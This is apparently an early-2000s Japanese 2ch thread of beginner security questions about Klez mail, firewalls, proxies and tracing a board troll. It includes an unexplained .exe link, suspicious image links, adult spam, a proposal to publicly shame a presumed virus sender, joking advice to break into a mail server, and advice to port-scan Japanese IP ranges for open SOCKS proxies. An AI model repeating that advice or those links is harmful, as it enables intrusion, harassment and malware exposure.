ファイアウォールも製品によっては下らないものまで
鬼の首でも取ったかのように報告するものもある
そもそもサーバーソフトウェアの入っていないマシン
なら余計なポートを開けていることも少ないはず
そういう個人のマシンにマジ不正アクセスしてくる例
はほとんどない

くだらない質問なのでここに書きます。
私のURLとメールアドレスを明記されて、
裸の写真（上半身）まで貼り付けた掲示板を見つけたんだけど
これだけじゃ抗議できないよねぇ。
だよねぇ。

>>148
>そもそもサーバーソフトウェアの入っていないマシン
なら余計なポートを開けていることも少ないはず

共有組んでるWINでNBT空いてたらﾄﾞｳｽﾙﾆｮ?
ちゃんと設定出来てなかったらﾄﾞｳｽﾙﾆｮ?
そこ突付かれたらﾄﾞｳｽﾙﾆｮ?

>>149
本人に無許可で写真を掲載したなら抗議できるだろう？
以前にその写真についての権利を特に放棄する契約とか
していなければ。

>>150
仮にもファイアウォールが入ってるなら
それがどんなクソベンダーのクソソフトだろうと
ＭＳのファイル共有を軽く外にさらすことはない

139を執拗に叩いてくるなら攻撃と呼んで良いだろうが
そういう例はほとんどない

裸の写真は私のじゃないです。
誰だか知らないけど、私になりすまして
あっちこっちに裸の写真貼り付けて、
私のメールアドレスもはりつけてるんです。
ふー。

>>149
>私のURL/メールアドレス/裸の写真（上半身)
それが該当URLのｻｲﾄにあけひろげで置いて有っても････
無断使用で文句言えるのか。。。

ﾁｸﾋﾞが写ってて、正確なｽﾘｰｻｲｽﾞと性感帯と好きな体位が明記されてれば､文句言えますね。
但し、それが本当に貴方のﾌﾟﾗｲﾍﾞｰﾄな情報であると立証できなければ･･････ﾊｧﾊｧ

>>152
初心者君だと、共有張りたくてなんでもANYで通しちゃうんじゃ無いかと
ﾊﾟｽﾜｰﾄﾞとかﾕｰｻﾞ設定とかもおざなりなんじゃ無いかと
ﾌﾄｵﾓｯﾀﾉｻ････

>>149
明らかにエロ系だし、そういう類は掲示板管理者かそこの
プロバイダに厳しく文句を言えば、だいたい即delだと思う。
ただし掲示板内ではとやかく言わない方が良い。

>>149
なりすましでエロ系掲示板書き込みっていうのは
逮捕例あったような気がするけどなあ。

>>153
掲載先の管理者に削除とログを保全してもらって、
当面は静観、ひどくなったら警察へ

http://www.mainichi.co.jp/digital/netfile/archive/200009/20-2.html

>>145

行ってもないサイトなんですけど・・・。
NISがsmtpへの送信を阻止しなかったのが悔しい。

>>135
関与アプリケーションは何？
そいつの許可ルールができているからだろう

ホームページを作ったのが絶対に私だってバレないように
したいんですけど
そういうことは出来ますか？
つまんない質問ですいません・・

<[email protected]>

>>161
特定の語句を使わなければ普通ばれない。

>>161
googleで検索されないように
http://www.google.co.jp/intl/ja/remove.html#exclude_pages
も見たほうがいいと思う。

age

定期的にOS再インストールするんで忘れてたが
よく考えたら半年も前にNAVの期限が切れてた
このまま使い続けたらまずいのかな・・・

AVGあたりに乗り換えたほうがいいのかしらん

　　　　　　　, ‐'"´　　　　　　　　｀'‐､
　　　　　, '"　　　　　 , -‐‐≡三~､''‐ヽ
　　　 ／　　　　　, ‐"::::::l::::::::::::::ヾ::ヽ　ヽ
　　／　　　　, ‐'":/:::::|::::|:::ヾ:::::ヽ:ヾ::::ヽ ヽ
　/　　　　, ‐":::/::::::/::|::::|:::l:::ヽ:::ヾ::ヾ::::ヽ i､
./　　/　 /::/:::/::::::/::::l:::::l:::l|:::::|:::::l:::i:::ヽ:::l　i,
'i　　// /::/:::/::::::/:::/ll'|::||::l.|:::::ll:|:|'i::i'|:::|:::| /
.l　////::::/:/::l::::l l‐|‐i|-ll-|､.ヾ||:|-‐|‐|::|::|/
.|　.// i::/:/:::/|:::| |., ‐i"ﾞO|''､　　 'i"q';､;::::l
.ヽ　l l .i::/:;;;=-l:::|‐i　 l;｡::::j　　　　l;::j. i:::::;:l
　ヽ　|/:/:::l!"L|::i.　 '０'''''"　　　　￣ﾞ .i:::::|i:l
.　 ヽ/:/l::::l'i ､ﾞ!:l. 　 0　　　　　__ '　 ／:::::i.ヾ､　はーどでぃすくがギーコギーコ、はぅー！
　　/://,|:::|:|:/:|:|"'､,　。　　　　　　 ／l::|:|:::|:l ヾ､
　 //./　|::|:/:/::/-ヽ　　ｰ-　, _／|::::|::::|::::|l:l　ヾ:､
　// |　　||:::/:::i／ヽi., ‐'"´ヽ￣,;/::::|:::|:;, ‐i:l　 l:/
..//　|　 /::/::l::lヽ　i￣＼　　,入/:::::l::::l /　ヽ|//
//　 |　/::/:/:/` ヽ ヽ　 ヽ／　/:/:::/::l/　 ,,,l‐i
|:|　　| /::/:::/i |｀`'',二l二-ヽ, /://::/:l‐‐''"　　l

http://members.tripod.com/hokahokagohannyo0/gca_v09i.exe

2日に一回くらいKlez付きのメールが送られてきます。メーラーはEdmax使ってます。
前に一度ここではないサイトの掲示板にメアドを書き込んだのが
原因だと思うのですが、そのアドレスを書いた書き込みはとっくに流れています。
アドレスはyahoo.co.jpのものだったり
[email protected]という訳のわからないものだったりします。
ノートンガ反応して、検疫してくれるのですが
こういうメールって、どうにかならないのですか？
送り先にやめろとメールするのも無駄だと思うし、
どうしようもありません。

>>168
不正シリアル番号の使用をやめる

>>168
http://pc.2ch.net/test/read.cgi/sec/1024255721/-100

>>168
アドレス変える

ハッキングできるサーバー見つけたんですけど、　ここでアドレスばらしたらまずいんですか？
というよりどうもニムダに感染しているらしくて、こっちに変なパケットがぶつかって来るんです。

ちなみに中国の公的機関のようです。　誰か中国語できる方メールを書いていただけませんか？

>>172
下手な中国語より下手な英語の方がいいと思われ

>>172
妄想はよそで

>173
日本語しかかけません。　アドレス教えたら書いてくれる？

>>175 英語できないﾔｼにスキルあるﾔｼいない。
IP変えたら？どうせ固定IPじゃないんでしょ。

ウェブサイト巡りをしていて、生のＩＰを隠したい場合はブラウザー（例：ＩＥ）
の設定からプロクシを使いますよね。

ReGetやRealDownload等のダウンローダーを使用する際に、生のＩＰを
隠したい場合はブラウザーからの設定とは別にダウンローダー側から
プロクシの設定をする必要があるのですか？それとも、ＩＥ等のブラウザーから
プロクシの設定をすれば、ダウンローダー側からはプロクシの設定をする必要は
特に無いのですか？

分かりにくい文章で申し訳ありませんが、どうか私の質問に答えて下さいませ。

別々に設定しなきゃダメ。

設定あるでしょ

ヘルプ読めよ。

REGファイルについてどうか教えてくださいな。

>>172
ニムダじゃなくて「ニダ」に感染しているんじゃないのか？

>>178
やっぱり別々に設定しなきゃダメなんですか。面倒くさいな〜。
>>179
えぇ、設定があるのは知ってました。
>>180
ヘルプを読むことにします‥‥。

皆さん、御回答くださってどうも有り難うございやした。

>>182
わらた。

>>183
設定する箇所があるなら、そこで設定するに決まってるだろ。ホントーにアホだな。
あと、Open Proxy使ってるとしたら、お前は氏んでいい。

相手が自分のメール読んだかどうか（何時に読んだとか）
分かる方法ってありませんか？

ちなみに相手のプロバイダー？はケーブルテレビです。

>>185
相手のPOPサーバに入ってログをじっくり読む。

>>185
あるにはあるが相手次第

>>187

相手次第とは？？
あっ　ちなみに法に触れないｏｒ普通に流通してる
範囲の方法でお願いします（汗）
無きゃ無いで諦めますし。

>>188
OEだと開封確認メッセージ
でも普及しているかは不明

ここ３、４日ウィルスメール（W32.Klez）が届くようになって
全てのそのメールのReturn-Pathが　[email protected]
なのですが、jcomにその詳細を送ればどうにかしてもらえるのでしょうか？

McAfee のパーソナルファイヤーウォールを入れて最新版にアップデートしたらなぜかX11のクライアントがエラーになる。
ログは出ないから設定のミスじゃないと思うんだけど、試しにオープン状態にしてもやっぱりエラーがでる。
なんで？

XIO: fatal IO error 54 (Connection reset by peer) on X server "192.168.0.1:0.0"
after 0 requests (0 known processed) with 0 events remaining.

>>190
もらえる。
けど、何か怪しい

>>192
え、怪しいって･･･？
対処してくれないということですか？

>>193
そういう意味じゃないけどね。
JCOMとは限らないってこと。

たった今、クレズが添付されたウイルスメールを受け取りました。
ところが、このメアドから発信者が容易に判別できてしまいました。
（素のメアドを使用していました）

・ＩＰ検索で一発で判別できました。
・送信者は独自ドメイン＆サイトを持っています。
・そこでネット通販をやっています。
・都内在住のようです。
・サイトに住所から電話番号まで全部記載されています。
・メルマガ（まぐまぐ）を発行しています。
・とりあえず１回だけ警告メールを送りました。

おそらく他のメルマガ発行者にも同様の嫌がらせを
している可能性があります。
こういう困ったちゃんをおしおきするために、みなさんで
最良の方法を考えましょう。

つーか、祭りにしてもいいんですけど。

>>195
ほっとけよそんなの･･･
そいつもタダの感染者だったりして

>>195　
ウィルスメールの本当の送信者なの？
その通販を利用したことのあるあなたの知り合いってことは？

>>196
禿どう

>>195
つーか、何でも意図的な嫌がらせだと思う
お前の精神構造が祭りの対象だろう

ついでに200げと

>>199
はげどう
自意識過剰なんですよ。

すいませーん。
あやしいページ踏んでしまったんですが。。。

↓ここ、ウィルスなのか、ただのブラクラなのか、どっちでしょう？
http://www.niji.or.jp/home/hs2903/imgboard/img-box/img20020807220521.jpg

>>202
ネタはよそで

ネタじゃないです。
心配なんで判断お願いします。

ネタじゃないなら自分でソース見て何やってるのか調べれ

>>204
ウィルススレとマルチ

>>202
糞マルチ氏ね。
二度と来るな

１９５です。

>ウィルスメールの本当の送信者なの？
>その通販を利用したことのあるあなたの知り合いってことは？

知り合いでも何でもありません。通販も利用したことないです。
件名もなしで中も空っぽのメールでした。

>つーか、何でも意図的な嫌がらせだと思う
>お前の精神構造が祭りの対象だろう

無意識にウイルス付きのメールを送ってくる人なんていないと思いますけど。

この人、メルマガを発行しているようですが、自分もかつてメルマガを発行して
いて、その時に晒していたメアド宛にウイルスを送ってきました。
（現在はそのメアドはまったく使っていません）

それに警告メールを送ったので、もし無実なら何らかの反応があっても
いいと思うのですが。

あと、ここでほっとけとか意図的な嫌がらせと結びつけるなと、レスしてる
人たちが多いようですが、送信者を特定できても普段からみなさんそういう態度で
いるのでしょうか？

>>208
２ｃｈに出入りしてる人間のクズどもからまともな意見をもらおうって
魂胆がダメなんだよ。
こいつらの脳みそはすでにウイルスに感染してるから前レスのような
排他的な意見しか出せないんだよ。それかこいつらも普段からウイルス
メールを送ってるような連中だってこった。
どうしてもそいつが許せないんだったら、住所わかってんなら直接
乗り込んではたいてやればいいじゃないか。それかそのまま警察にたれこんでやれよ。
もう一度いう。２ｃｈでまともな回答を得ようとしているお前が甘いんだ。

>>208
KlezはFromを偽装することを知ったうえでの発言か？

確認君で出た自分のＩＰと「winipcfg」コマンドとかででるＩＰが
違うのはなぜですか？

>>211
串使ってない？

何にも使ってません。

これって日本ハムの社員さんですか？
fushianasanしてるみたいなのですが・・・。

http://choco.2ch.net/test/read.cgi/disaster/1025361756/73

73 名前：http:// fw1.nipponham.co.jp.2ch.net/ ：02/08/09 09:37 ID:???
guest　guest

net send で確認君で表示されたＩＰを使ってメッセージを送ろうとしても
送れません。なぜでしょうか？

>>213
192.0.0.1とか表示されてない？
その場合はルータのIPアドレスになるよ。

不正侵入について
回線を外したのにノートンが
「リモートシステムがこのＰＣにアクセスしようとしています」
と警告を出しきます
これは私のＰＣの中から、外部にアクセスしようとする何かがいると言うことですか？
それとも外部から？　お願いします。

>>208
世田谷区民の田中さん、どーぞご覧ください。
http://www.nai.com/japan/virusinfo/klezezukai.asp

>>217
リモートシステム「が」このPC「に」アクセスしようとしていると思われ

>>218
馬鹿な世田谷区民は、ほっとけよ

>>217
そこのログを貼ってください。

ログってこれでいいんですか？
２５５．２５５．２５５．２５５　

>217
激しくワラタ。

なんでワラウんですか？しかも激しく。
ボクは真剣ですよ

２５５．２５５．２５５．０
じゃないんだ。

>>218 (w
>>208は山田君をさがしなよ。

>217
なんか変なアプリ使ってないか？　回線を外したってことはダイヤルアップだとは思うが
ノートン使っていないからわからん。　何番のポートにアクセスされてるのかわかるか？

>>211
プライベートIPアドレスとグローバルIPアドレスじゃねーのか？

こんにちは
私はwebメールを使っているのですが、最近おかしなメールが来て困っています
[email protected]
[email protected]
とか、たぶん自分で考えた、いたずらのアドレスで届き
見ようとすると画面がエラーになるのです。

週にニ、三度来るのですがどうしたら良いのでしょうか？

-------風俗の総合商社・ＭＴＴどこでも-------

〇デリバリーヘルス〇デートクラブ〇女性専用ホストクラブ〇
〇ハードＳＭ奴隷クラブ〇レズビアン倶楽部〇ホモ・オカマ倶楽部
〇変態痴女と遊ぶ会〇痴漢・覗き趣味の会〇変態同好会・各種！
●楽しく遊べます！　090-8002-8356番
-----------美男・美女会員など多数在籍中-----------
　 http://www.mttdocomo.jp/
-----女性アルバイト随時募集・高収入（日払い）月100万円可能住み込みも可
-----レズビアン・スタッフ●ホモスタッフ●女性専用ホストスタッフ同募-----
http://www.mttdocomo.jp/
------------------------------------------------

>>229
捨てる

読まないかそのメールアドレスは廃棄処分する

>>231
>>232
メール串とか使ってたら追跡不可能ですか？
いちおう、迷惑がかかってるわけですからプロバイダが追跡してくれないもんですかねえ
重大な犯罪以外だったら、おとがめ無しできるということでしょうか？

>>233
ヘッダ晒せや。

>>234
ウェブメール上では、無効な構文エラー、ページを表示できません
検索中のページは、削除されたか、名前が変更された可能性があります。

と表示されて見えません。

ソースを見ても、よくプロパティで見るようなヘッダ情報は無いんです

ゲームについて聞きたいんですが、海外のゲーム会社では開発中の
データが金で買収された社員とかに持ち出されて海賊版が出回って
しまうとかの話を聞くのですが、日本のゲーム会社でも同様の事が
行われるのでしょうか？ゲーム会社のデータ管理はどの様にして
行われているんですか？

素数判定が多項式時間で可能、コンピュータ暗号に影響大―インドの数学者証明
http://news2.2ch.net/test/read.cgi/newsplus/1028876818/l50

何がまずいのか来て説明してくれ

>>236
ゲーム板の業界スレあたりでききなよ

>>238
セキュリティについて聞きたいんだからここでいいでしょ

>239
聞くだけなら自由だ。（荒らさない限り）
答える人間がこことゲーム業界スレとどっちが多いか別にすれば。

>>240
セキュリティに関して聞きたいから質問するのに適切なのはここだと
思うから質問する場所を変更するつもりはありません

>>241
でもここはネット板のセキュリティスレだからな〜

数学一番苦手

そもそも>>236の質問は板違いだと思うが。>>242にﾊｹﾞﾄﾞｳ
＞この板は、LANや個人のPCへの侵入、トロイ、ウィルス等、
＞様々なネット上の危険からの防御法や対策を語りあうための板です。
板違いにもかかわらず執拗に書き込むと荒らし。

粘り具合が子供だから放置ね

>>236
そういうのを世間では産業スパイといいます。
データ管理云々よりもデータにアクセスできる人間を選んで
脅迫買収工作で取り込みます。日本は産業スパイ天国ですよ。

>>246 >>245

世田谷区民に便乗して質問なんですけど。
クレズのように送信者偽造メールでも、元の送信者をたどることって
可能なのでしょうか？

それとも、送信者がそのまま自分のメアドで相手にウイルスを送りつけて
それが発覚しても「俺じゃない」なんて言い逃れはできるのでしょうか？

どっちも可能

>>237
そのスレの 9 と 20 を嫁

PCだとはじかれる携帯サイトはどうすれば見れる？
http://www.richman.tv/

>251 携帯で見る

>>251
そこはPCでもはじかれない

下のほうのjpg画像が見れません。

>>254
下の方ってどこの？

http://net.gasuki.com/html/jpg29.html
です

今度光ファイバーにするんですが、以前ケーブルの奴はIPアドレスを
抜かれるとまずいみたいな書き込みを見たことがあるんですが、
実際のところどうなんでしょうか？
教えてくらはい。

>>257
マズイね
殺された人もいるし

>>258
お前みたいなやつは質問スレッドに来るな

>>259
イヤだが何か？

ウィルスバスター2002を入れようとしたらゾヌAlarmが入ってるからダメ、
と言われたんですがカスタムインストールは出来ないんでしょうか？

>>261
できない

>262
ガーン！そうなんですか。
マカフィーのまま頑張るか、ノートン入れるか・・。

すいません。今２ちゃんのフラッシュを見ていたら、画面がデスクトップ
フォルダとなって、自分のパソコンの情報が出てきました。
これってやばいですか?

>>264
状況不明すぎ。もっと詳細に正確に報告しる。

>>264
こういうリンクが仕掛けられていなかったか？
file:///C:/

すいません。２６４です。FLASH板であるアドレスをクリックしたところ
動画をダウンロードしていたらIEの画面がデスクトップフォルダとなって
自分のパソコンのデスクトップの情報が表示されました。（名前、サイズ
最終履歴）などです。履歴にもフォルダのアイコンが表示されています。
最近、突然ウインドウが表れて、ヤフ−なんとかの購買を更新しました、
とかなんとか言ってすぐ消えてしまったんですが、これも関係あるでしょうか?

>>267
お前さあ、解決して欲しいんだったら直接リンクを貼れよ。

>>266さん
今アドレス見てきたんですが、それはありませんでした。
自分はマックOS９.２でADSLなんですが、買ってからまだ何もソフトは入れてません。

>>269
だから、そのリンク張れよ。

>>２７０
http://ime.nu/www.newgrounds.com/portal/uploads/59000/59448_Kung_Fu_3.swf
です。遅くなってすいません。

ウィルスバスターとノートンではどちらが使いやすいですか？

http://pc.2ch.net/test/read.cgi/win/1014282464/
ここ開くとノー�d先生が真っ赤になって怒るんですが
どうしてですか？

>>273
そこの142が犯人ﾌﾞﾋｰ

UNIX系OS専用のアンチウィルスソフトってありますか。
AIXで使用可能なものがありましたがPowerPCのみの対応でした。
っていうか必要ないのかなぁ。

>>271
新手の宣伝なのか？
面白かったが

>>274
ありが�d

特に心配するほどの事態ではないんでしょうか?
だったらお騒がせしてすいません。何せ初めてだったので。

>>278
再度同じことをして、同じ現象が生じるかどうか試してみよう。

掲示板からIPってどうやって見るんですか？
どなたか教えてくださ〜い！

>>280
そんなものは見れない＆板違い

>>279さん
やっぱり同じ現象が出てしまいました。
みなさんは出てないみたいだし。ダウンロード完了後IEのページが
デスクトップフォルダとなって自分のパソコンのことが出てる。うーん…

VBS.Network.E
このウイルスってどうやって除去すればいいんですか？

Kerio Personal FirewallにIDSの機能は付いてるんでしょうか？

マクロメディアショックウェーブフラッシュにセキュリティーホール見つかる
http://pc.2ch.net/test/read.cgi/pcnews/1014872364/371

全てのパターンを更新してくださいとのこと。

winマシンとmacをLANで繋ごうと思っているのですが、
プロバイダーの方にHUBが必要と教えられました。

ですがHUBとスイッチングHUBの違いがわかりません。
どちらを購入すれば良いでしょうか？

インターネットもファイル共有もしたいと考えています。
WIN98+imac+ADSL（モデムルータータイプ）です。

>>286
http://www.e-words.ne.jp/読め

>>287
ご親切にありがとうございます！
こんなサイトがあったとはー。検索の仕方、勉強します。
朝一で買わないといけなかったので
ホント助かりました！ありがとうございました。

ウィルスチェックはWINDOWSフォルダ以下を検索しとけば
大丈夫だよね？
HDD全体を検索するのは精神的にも時間的にもつらいです。

>>289
大丈夫だけど一応、\tmpもやってみたら？

>>289
なんで大丈夫なんだよ。

socks串の探し方教えてください。

ぐたいてきにいうｔ

途中で送信してしまった・・・

具体的には日本のsocksサバーを探しています
ついこの間wingateなるものを落としましたが使い方が解りません
どなたか教えてください(つД=）

スタートアップやAutobatからD:\にあるトロイ、ウイルスを起動させられたら…
って考えられるので大丈夫じゃないよ。多分。

>>292
日本に割り当てられてるIPアドレス範囲のポート1080をスキャンする。
FW厨に攻撃されましたと晒される危険がある諸刃の剣。

ﾄﾘｰﾌﾟ解析のスレッドはどこ逝きましたか？

>>295
ｻﾝｸー、虎穴にはいらずんば〜って感じッスか････(つД=)

Autobat

なんか/tmpに.aとかいうファイル仕込まれました。

>>293
説明してあるHPが腐るほどあるだろ。

>>18のやつ、どうなの？

いままで捨てアドでネット友人とメールのやりとりをしていたのですが
うっかりして本アドで返信してしまいました。
本アドを変更するしか手はないでしょうか？

>>302
マルチ

>>302

http://pc.2ch.net/test/read.cgi/sec/1026862203/748
読め

>>302
そうですね

http://www.chkrootkit.org/のミラーからchkrootkit-0.36.tar.gzを落としたんだけど
chkrootkit.md5を見ると
295c865bd55bbc4f6c8377abe9f27c1c　　　　 chkrootkit-0.36.tar.gz
だが
chkrootkit-0.36.tar.gz本体は
9c3371176a6b9ba07ccf9fee600c143　　　　 chkrootkit-0.36.tar.gz
ですた。

これってウイルスかtrojanが入っているって事？

ちなみに
ftp://ftp.pangeia.com.br/pub/seg/pac/chkrootkit.tar.gzでは

chkrootkit.md5、chkrootkit-0.36.tar.gz共

295c865bd55bbc4f6c8377abe9f27c1c　　　　 chkrootkit-0.36.tar.gz
295c865bd55bbc4f6c8377abe9f27c1c　　　　 chkrootkit-0.36.tar.gz
ですた。

だれか教えれ。

何にもしてねえのにマウス動かしたらいきなり再起動かかったり
する事あるんだけどこれってトロイ系の何かしこまれてんのかと
ビビッタけどこういうことってあるの？

test

シマンテックとトレンドマイクロが合併して
製品名が「バスターノートン」になる可能性はありますか？

あの。すいません。
アイコンが
閉じるボタン「×」とかが
ギリシャ文字なんですけど
直し方をご存知でしたら、教えてください

>>309
浦沢さんに聞いて下さい

>>310
ttp://homepage2.nifty.com/winfaq/superfaq.html#74

何故にここで聞くのかが謎だな・・・

>>311はバスターキートンを知らんのか･･･

ｽｷｬﾝ: 2002/08/10 21:18 ｳｲﾙｽ!
F-Secure Anti-Virus for Windows ﾊﾞｰｼﾞｮﾝ 4.10

使用スキャンエンジン:
F-PROT Version 3.10.203 (データベース記載日 2002-03-18)
AVP Version 3.133.3111 (データベース記載日 2002-03-17)

検索: ﾄﾞﾛｯﾌﾟ　ﾌｧｲﾙ
ｱｸｼｮﾝ: ｳｲﾙｽを駆除
ﾀｰｹﾞｯﾄ: ﾌｧｲﾙｳｲﾙｽ ﾌﾞｰﾄｾｸﾀーｳｲﾙｽ
ﾌｧｲﾙ: 全て

ｽｷｬﾝの結果:
ｽｷｬﾝ済み: 1 ﾄﾞﾗｲﾌﾞ, 16 ﾌｧｲﾙ, 1 ﾌﾞｰﾄｾｸﾀー

時間: 0 分 01 秒
ｳｲﾙｽの発見数: 感染 1、 感染の可能性 0 = 合計 1 ﾌｧｲﾙ
駆除したﾌｧｲﾙの数: 0 ﾌｧｲﾙ

c:\windows\temporary internet files\content.ie5\ft5n2vuw\lame[1].0tm
感染: 'JS.Trojan.WindowBomb.d' [AVP]


スキャンしてたらこんなの発見されますた。
しかしgoogle検索してもこのウイルスが見つからない…
もうだめぽ

くだらねぇ質問はここに書き込めってどんな質問がくだらないの？
って言う質問が一番くだらない質問だと思う今日この頃

ご質問します。
「：」を打つと
警告音が鳴って、ビッグローブのファイルを実行しようとするのですが
対処方法をご存知でしたら教えてください。

今、セキュ板の「スレッドの一覧」を開くと、ノートンが2回反応するんだけど・・・

>>315
Googleで調べるのも面倒な質問がくだらない質問です

>>317
ユーザーが怠慢だからです、多分

>>314
F-Secure Anti-Virus for Windowsと言えば世界最高の
Anti-Virus Softの一つだけど（お値段も最高だけど）
何故定義ファイルをアップデートしない？

とりあえずウイルス名は各Venderによって違ったりするから
KAVのVirus Encyclopedia（ウイルス百科事典）ででも
調べたほうがいいと思うけど。

ウイルスの発見場所からすればNortonのLove Letter Virusの
誤検出と同じ問題のような気がするけど。

>319 WarezだからUpdateできないに一票

くだらない質問かもしれませんが・・・・
Outlookを開くと必ず、「アドインC\ProgramFiles McAFee・・・・・を
読み込めません。」というメッセージが出ます。
セキュリティーはノートンを入れているので、
プレインストールしてあるマカフィーは削除したはずなのですが。
どうしたらこのメッセージが出なくなるように出来ますか?

>>321
マカフィーの設定が残ってるんじゃないの？

ノートンをアンインストール
マカフィーをインストール
余分な設定を解除してマカフィーをアンインストール
ノートンをインストール

でいいと思うがマカフィーのサイトで調べたほうがいい

60分もの無修正アダルトビデオが見放題！

無料サンプルもあります。

閲覧は、ここからどうぞ！













Click here to be removed from a list.










http://www.terra.es/personal9 って誰よ?

漏れのパソコン国際電話につながってるかもしれない。。
誰か調べる方法教えてください。。。
マジで鬱。。
スレ違いだったらスマソ。

>>324
モデムのプッシュ音が長過ぎないか？

＞３２５
いや、うちＡＤＳＬなんだ。。
つなぎっぱなしで国際電話だったらと思うと。。
やべぇぇ。。

>>326
じゃあ気にするな

気になるＹＯ〜〜！

>>324
いい加減、検索エンジンの使い方を覚えろ
「No!国際電話」などなど

>>328
えっと驚く前に―国際電話･Q2からの事前防御策―
ttp://www3.plala.or.jp/hiro-mg3920/tel.html

60分もの無修正アダルトビデオが見放題！

無料サンプルもあります。

閲覧は、ここからどうぞ！ -> http://www.terra.es/personal9/ihb1001

Click here to be removed from a list. -> [email protected]?subject=remove

＞３２９・３３０
サンクス！見てみるＹＯ！

>332
56kモデムはPCにささってるか？
もし56kモデムを全く使っていないのならば、気にしなくて良し。
もし56kモデムを使っているのならば、56kモデムからでているモジュラーケーブルをひっこぬけ！

＞３２９・３３０・３３３
ありがとうございました！！
いろいろ読んで大丈夫なことが判明♪
お騒がせいたしました！！

>>306
ソース読め。馬鹿。

やきうどんはさみで切って薄いのりふって喰え。ぼんだれ。

誰か知ってたら答えてﾎｽｲ

>>337
ついてない。専用のスレで勉強しる。

http://pc.2ch.net/test/read.cgi/sec/1022081681/l50

>>338
ありがとうございますー

くだらない質問ですが　掲示板荒らしを見つける方法を教えてください
どうも日本国外を経由して来ているみたいなのよね
IPアドレスでわかります？162.114.211.139

>>340
海外のOpenProxyを経由しているという理解でよろしいか?
まぁ、国内でもProxy経由なら、掲示板のあるサーバからはProxyのIPアドレスまでしか分からないねぇ。
あとは、該当Proxyの管理者に言ってログ調べて貰うくらい。

>>掲示板荒らしを見つける方法
掲示板を荒らしてる奴がどいつか調べる方法？
荒らされてる掲示板をWEBから探し出す方法？

長文でスマソ
IPアドレスから得た情報は以下のとおりですが　なにがなにやら
inetnum: 162.0.0.0 - 162.255.255.255
netname: IANA-NETBLOCK-162
descr: This network range is not allocated to APNIC.
descr:
descr: If your whois search has returned this message, then you have
descr: searched the APNIC whois database for an address that is
descr: allocated by another Regional Internet Registry (RIR).
descr:
descr: Please search the other RIRs at whois.arin.net or whois.ripe.net
descr: for more information about that range.
country: AU
admin-c: IANA1-AP
tech-c: IANA1-AP
remarks: For general info on spam complaints email [email protected].
remarks: For general info on hacking & abuse complaints email [email protected].
mnt-by: MAINT-APNIC-AP
mnt-lower: MAINT-APNIC-AP
changed: [email protected] 20020530
source: APNIC

つづき・・・・わかりますか？

role: Internet Assigned Numbers Authority
address: see http://www.iana.org.
e-mail: [email protected]
admin-c: IANA1-AP
tech-c: IANA1-AP
nic-hdl: IANA1-AP
remarks: For more information on IANA services
remarks: go to IANA web site at http://www.iana.org.
mnt-by: MAINT-APNIC-AP
changed: [email protected] 20020530
source: APNIC

IANA・・・よく見るね。

漏れもよく見る…
有名な所なの？

http://www.google.co.jp/search?q=cache:hURBdpO-1LcC:www9.ocn.ne.jp/~yusuke/home/proxy/+%22162.114.211.139%22&hl=ja&lr=lang_ja&ie=UTF-8

>>343
descr: Please search the other RIRs at whois.arin.net or whois.ripe.net
descr: for more information about that range.
読めないなら使うな。

>>346
そりゃもう有名で。
この板だと2日に1度は見ますよ。
同じような質問でね。

>>344
whois 違い。よく読め。
descr: If your whois search has returned this message, then you have
descr: searched the APNIC whois database for an address that is
descr: allocated by another Regional Internet Registry (RIR).

IANAってなんスか？　これがその海外のOpenProxyというやつ？

>>340
で、君はいったいどうしたいのよ。
荒らしを止めさせたいの？
懲らしめたいの？
恋しちゃったから付き合いたいの？

>>344
ぼけが。
Commonwealth of Kentucky Dept. of Information Systems (NET-KYFC)
101 Cold Harbor Dr
Frankfort, KY 40601
US

Netname: KYFC
Netblock: 162.114.0.0 - 162.114.255.255

344のはじめに『Internet Assigned Numbers Authority 』と書いてありますね。

http://www.atmarkit.co.jp/aig/01xml/iana.html
を読めばわかるかな。

>>343
お前、そのでたらめなwhoisの使用法誰に習ったんだ?

そして探すのは無理としてもアクセス制限かけるには
どーーしたらいいのでしょう？

>>340
その知識じゃ無理だ。

>>340
これ何よ（ｗ↓
[Output from ARIN Whois]
Search results for: 162.114.211.139
Commonwealth of Kentucky Dept. of Information Systems (NET-KYFC)
101 Cold Harbor Dr
Frankfort, KY 40601
US
Netname: KYFC
Netblock: 162.114.0.0 - 162.114.255.255
Coordinator:
Mulligan, Michael L. (MLM1-ARIN) [email protected]
(502) 564-8772
Domain System inverse mapping provided by:
AZURE.STATE.KY.US162.114.248.1
MIDNIGHT.STATE.KY.US162.114.248.2
Record last updated on 15-Feb-2000.
Database last updated on 9-Aug-2002 20:01:47 EDT.

HP全体を制限する⇒.htaccess等を使う。
掲示板で制限する⇒掲示板の設定で行なう。

>>353
かぶた。。。氏ぬしかない。。。。

>>358
外出
>>340
CGIとJavaScriptとCookie使え

相手は串つかってるんだっけ。。。
まずは串制限だな。

>>360
しぬな。良くあることだ。

その串制限のやり方をおしえてくださいマソ

>>362
jpドメイン以外を蹴るのもありでしょ。どーせ、個人サイトだろうし。

>>364
荒らされるような掲示板なんか閉鎖しろ

>>364
http://www.google.com/search?num=50&hl=ja&ie=Shift_JIS&q=htaccess&btnG=Google+%8C%9F%8D%F5&lr=lang_ja

>>364
板のトップに「荒らしたら友人のハッカーに頼んで追い込みます」とでも書いとけ。

掲示板のメンテナンス画面に項目ないの？

ってか掲示板はレンタル？自分で設置したの？

>>363
ありがとございます。。。もう少しだけ････ｲｷﾃﾐﾙｺﾄﾆｼﾏｽ

360ﾖﾘ

>>369
レンタルっす　JPドメイン以外を蹴るという方法はどうしたら？

　　　　彡ミミミヽ ﾉ彡ミミ)
　　　((彡ミミミミ))彡彡)))彡)
　　　彡彡ﾞﾞﾞﾞﾞ"ﾞﾞ""""""ヾ彡彡)
　　　ﾐ彡ﾞ　..＿ 　　　＿ 　 ﾐﾐミ彡
　　((ミ彡 '´￣ヽ '´/￣　｀ ,|ミミ))
　　ミ彡　 '￣￣' 　〈￣￣ .|ﾐミ彡
　　ミ彡|　　） ）　| |　｀（ （　|ﾐ彡
　 ((ﾐ彡| 　（ （　-し｀)　） ）|ﾐﾐミ　　　／￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣
　　　 ゞ|　 ） ）　 ､,!　」（ (　|ソ　　　＜　感動した！
　　　　　ヽ（ （￣￣￣' ) ）/　　　　　 ＼＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿
　　　　　,.|＼､)　 　　' ( ／|､
　　￣￣| ｀＼.`──'´／ |￣￣｀
　　　　　 ＼　~＼,,／~　 /
　　　　　　　＼／▽＼／

>>371
質問に答えろ。
> 掲示板のメンテナンス画面に項目ないの？

>>340
